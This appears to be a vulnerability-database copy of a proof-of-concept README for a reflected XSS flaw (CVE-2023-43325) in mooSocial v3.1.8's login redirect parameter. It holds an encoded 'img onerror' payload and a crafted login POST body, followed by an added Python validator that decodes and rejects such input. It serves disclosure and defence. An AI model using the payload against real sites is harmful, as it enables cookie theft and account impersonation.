CVE-2023-43325 PoC — mooSocial Cross-Site Scripting Vulnerability

Source
Associated Vulnerability
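Title: mooSocial Cross-Site Scripting Vulnerability (CVE-2023-43325)
Description: mooSocial is a multi-platform, mobile-ready, user-friendly script from the company mooSocial, used to build community-driven content-sharing and social networking websites. mooSocial v3.1.8 contains a cross-site scripting vulnerability that stems from cross-site scripting in the data[redirect_url] parameter, allowing attackers to steal users' session cookies and impersonate their accounts via a crafted URL.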
Description
mooSocial v3.1.8 is vulnerable to cross-site scripting in the user login function.
Readme
# mooSocial: XSS (CVE-2023-43325)
A reflected cross-site scripting (XSS) vulnerability exists in the data[redirect_url] parameter of the user login function of mooSocial v3.1.8, which allows attackers to steal users' session cookies and impersonate their accounts via a crafted URL.

Vulnerable Parameter: **data[redirect_url]**

## Exploit - Proof of Concept (POC)

### Reflected cross-site scripting (XSS)
```
Payload : test"><img src=a onerror=alert(1)>test
Payload (Base64 encoded) : dGVzdCI+PGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q=
Final Payload (Base64 + URL encoded) : dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d
```
POST request to /moosocial/users/login (request body only):
```
[_method=POST&data%5Bredirect_url%5D=dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d&data%5BUser%5D%5Bid%5D=&data%5BUser%5D%5Bemail%5D=admin%40localhost.com&data%5BUser%5D%5Bpassword%5D=pas[redacted]&data%5Bremember%5D=0]
```
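
A defensive check for the parameter described above, as an added example that is not part of the original README or of mooSocial's code: it decodes `data[redirect_url]` from a form body the way the PoC encodes it (URL encoding over Base64), rejects anything that is not a plain same-site path, and returns the HTML-escaped form that is safe to reflect. The function names and the allow-list policy are assumptions; the first sample is the redirect field from the request above, the second is constructed.

```python
import base64
import html
import re
from urllib.parse import parse_qs, quote

PARAM = "data[redirect_url]"
# Characters that let a reflected value break out of an HTML attribute or tag.
HTML_META = re.compile(r"[<>\"'`]")
# Assumed policy (not from the page): only same-site absolute paths are valid.
SAFE_PATH = re.compile(r"/(?!/)[A-Za-z0-9_\-./?=&%]*")


def decode_redirect(body):
    """Decoded data[redirect_url]; None if absent; ValueError if not Base64."""
    values = parse_qs(body, keep_blank_values=True).get(PARAM)
    if not values or not values[0]:
        return None
    # parse_qs turns an unescaped '+' into a space; restore it, then fix padding
    # (the page's sample carries two '=' where Base64 needs one).
    raw = values[0].replace(" ", "+").rstrip("=")
    raw += "=" * (-len(raw) % 4)
    return base64.b64decode(raw, validate=True).decode("utf-8", "replace")


def assess(body):
    """Classify a login form body by what its redirect parameter decodes to."""
    try:
        decoded = decode_redirect(body)
    except ValueError:  # binascii.Error is a ValueError subclass
        return {"verdict": "reject", "decoded": None, "escaped": None}
    if decoded is None:
        return {"verdict": "no-redirect", "decoded": None, "escaped": None}
    bad = HTML_META.search(decoded) or not SAFE_PATH.fullmatch(decoded)
    return {"verdict": "reject" if bad else "allow", "decoded": decoded,
            "escaped": html.escape(decoded, quote=True)}  # safe form to reflect


# Redirect field from the page's request body (other fields omitted here).
POC_BODY = ("_method=POST&data%5Bredirect_url%5D="
            "dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d"
            "&data%5Bremember%5D=0")
# Constructed benign body: Base64 of the relative path "/home".
BENIGN_BODY = "data%5Bredirect_url%5D=" + quote(base64.b64encode(b"/home").decode())

if __name__ == "__main__":
    for body in (POC_BODY, BENIGN_BODY):
        print(assess(body))
```

The same decode-then-validate step works as a log or WAF rule, since the encoded value carries no HTML metacharacters until the Base64 layer is removed.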

### Screenshot
![image](https://github.com/ahrixia/CVE-2023-43325/assets/35935843/b6b8b968-e0b5-4e70-8285-4e0abbfe8f3b)
File Snapshot

```
[4.0K] /data/pocs/bfe17fe2d900b935e6e6fa958794fe7b1129596d
└── [1.0K] README.md

0 directories, 1 file
```